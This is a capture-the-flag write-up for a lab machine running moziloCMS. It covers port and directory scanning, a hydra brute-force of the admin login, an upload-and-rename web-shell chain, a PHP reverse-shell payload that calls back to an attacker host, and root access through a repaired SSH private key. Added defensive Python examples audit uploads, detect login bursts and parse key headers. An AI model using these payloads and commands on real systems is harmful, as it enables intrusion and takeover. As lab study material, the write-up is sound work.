mazesec lzh
Information gathering
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds
# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status
Vulnerability analysis
backup.zip was found; it is a backup of the website. It reveals moziloCMS 3.0-3.0.1, whose vulnerability is described as follows:
1. Log in as administrator
2. Go to the "Files" section via the left menu
3. Create a .jpg file whose content is a PHP web shell
4. Upload the file to the server via the upload icon and save it
5. Rename the file to .php on the web server and save it
6. Access the web shell via the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
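The defensive counterpart of the steps above is an audit of the upload tree for files that should never be there. This is an added example, not moziloCMS code or part of the writeup; it assumes the kategorien/<category>/dateien/ layout and builds its sample files in a temporary directory.

```python
"""Audit a moziloCMS-style upload tree (kategorien/<category>/dateien/) for web-shell-style
files. Added example, not moziloCMS code; the sample files below are constructed."""
import os
import tempfile

EXEC_EXT = {".php", ".phtml", ".phar", ".php5", ".php7"}
IMAGE_MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff", ".png": b"\x89PNG", ".gif": b"GIF8"}

def classify(path):
    """Return a finding for path, or None if the file looks like an ordinary upload."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if ext in EXEC_EXT:
        return "server-executable extension in upload dir"
    if b"<?php" in data or b"<?=" in data:
        return "PHP open tag inside non-PHP file"
    magic = IMAGE_MAGIC.get(ext)
    if magic and not data.startswith(magic):
        return "extension does not match file magic"
    return None

def audit_uploads(root):
    """Walk every dateien/ directory under root and collect (relative path, finding)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) != "dateien":
            continue
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            verdict = classify(path)
            if verdict:
                findings.append((os.path.relpath(path, root), verdict))
    return findings

def demo():
    """Build a constructed sample tree mirroring the steps above and audit it."""
    root = tempfile.mkdtemp()
    d = os.path.join(root, "kategorien", "Willkommen", "dateien")
    os.makedirs(d)
    samples = {
        "logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,           # genuine JPEG header
        "shell.jpg": b"<?php echo 'constructed sample'; ?>",     # PHP hidden under .jpg
        "revshell.php": b"<?php echo 'constructed sample'; ?>",  # already renamed to .php
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(content)
    return audit_uploads(root)
```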
First go to the mozilocms directory:
http://192.168.110.133/mozilo/ # main directory
http://192.168.110.133/mozilo/admin/ # admin login page
# After too many attempts the following appears:
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # too many incorrect login attempts; no further input is accepted at this point
// Check login data
// Initialize the hasher
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
// Check the admin account (this function keeps no failed-attempt counter and enforces no lockout)
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; // check the secondary account
} else {
return false; // login failed, return false
}
}
The restriction only exists on the front end, where the submit button is disabled:
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">
So the login can be brute-forced:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I
This yields admin:Admin123, which gets us into the admin backend.
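Because the lockout is only a disabled button, the server side sees the whole guessing run in its access log. The following is an added example (not part of the writeup) that flags such bursts against the login URL; it assumes Apache combined log format and the hydra convention above, where a failed attempt re-renders the form (200) and a success redirects (302). The log lines are constructed.

```python
"""Flag password-guessing bursts against /mozilo/admin/index.php in an Apache access log.
Added example, not part of the writeup; assumes Apache combined format and the 302-on-success
convention used by the hydra command above. The sample log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
LOGIN_PATH = "/mozilo/admin/index.php"
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"])

def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Map each offending IP to its total login POSTs and whether a 302 followed the burst.
    A burst is at least `threshold` login POSTs from one IP inside any sliding `window`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?")[0] == LOGIN_PATH:
            posts[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                success = any(st == 302 for _, st in events[end:])
                alerts[ip] = {"attempts": len(events), "success_after": success}
                break
    return alerts

def sample_log():
    """Constructed lines: one host sends 12 failed POSTs then a 302; another logs in once."""
    fmt = '{ip} - - [{ts}] "POST /mozilo/admin/index.php HTTP/1.1" {st} 812 "-" "constructed-UA"'
    base = datetime(2025, 12, 14, 6, 50, 0)
    stamp = lambda sec: (base + timedelta(seconds=sec)).strftime("%d/%b/%Y:%H:%M:%S +0000")
    lines = [fmt.format(ip="192.168.110.141", ts=stamp(i), st=200) for i in range(12)]
    lines.append(fmt.format(ip="192.168.110.141", ts=stamp(12), st=302))
    lines.append(fmt.format(ip="192.168.110.50", ts=stamp(0), st=302))
    return lines
```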
Exploitation
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>
Prepare the payload.
Following the description above gives a shell; enumerating users turns up welcome:
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it
Privilege escalation
In welcome's home directory there is an id_rsa that belongs to root.
But its first three characters are missing. It is an OpenSSH-format private key, whose beginning is fixed: openssh-key-v1\0, so the base64 body must start with the encoding of that magic:
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=
With the key repaired we can log in as root.
Lessons learned
I did not read the registration source code carefully, so I did not know the password policy.
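The fixed magic the writeup relies on is the start of the openssh-key-v1 container, whose header also records whether the key is passphrase-protected; an unencrypted root key readable by another user is the weakness here. The following is an added example, not part of the writeup, that parses that header; the sample key bytes are constructed and contain no real key material.

```python
"""Parse the header of an OpenSSH "openssh-key-v1" private key and report whether it is
passphrase-protected. Added example; the sample key built here is constructed, not real."""
import base64
import struct

MAGIC = b"openssh-key-v1\x00"

def read_string(buf, off):
    """Read a uint32-length-prefixed string at off; return (bytes, new_off)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def parse_header(pem_text):
    """Return cipher, kdf, nkeys and an encrypted flag, or raise ValueError on a bad blob."""
    body = "".join(l for l in pem_text.splitlines() if not l.startswith("-----"))
    raw = base64.b64decode(body)
    if not raw.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob (base64 body should start b3BlbnNzaC1rZXktdjE)")
    off = len(MAGIC)
    cipher, off = read_string(raw, off)
    kdf, off = read_string(raw, off)
    kdfopts, off = read_string(raw, off)
    (nkeys,) = struct.unpack(">I", raw[off:off + 4])
    return {"cipher": cipher.decode(), "kdf": kdf.decode(), "kdfoptions_len": len(kdfopts),
            "nkeys": nkeys, "encrypted": cipher != b"none"}

def build_sample(cipher=b"none", kdf=b"none"):
    """Construct a minimal key file: header, one 8-byte dummy public key, empty private section."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    blob = MAGIC + s(cipher) + s(kdf) + s(b"") + struct.pack(">I", 1) + s(b"\x00" * 8) + s(b"")
    b64 = base64.b64encode(blob).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END OPENSSH PRIVATE KEY-----\n"
```

Feeding a key whose first three characters were cut off, as in the writeup, makes parse_header raise with the expected prefix in the message.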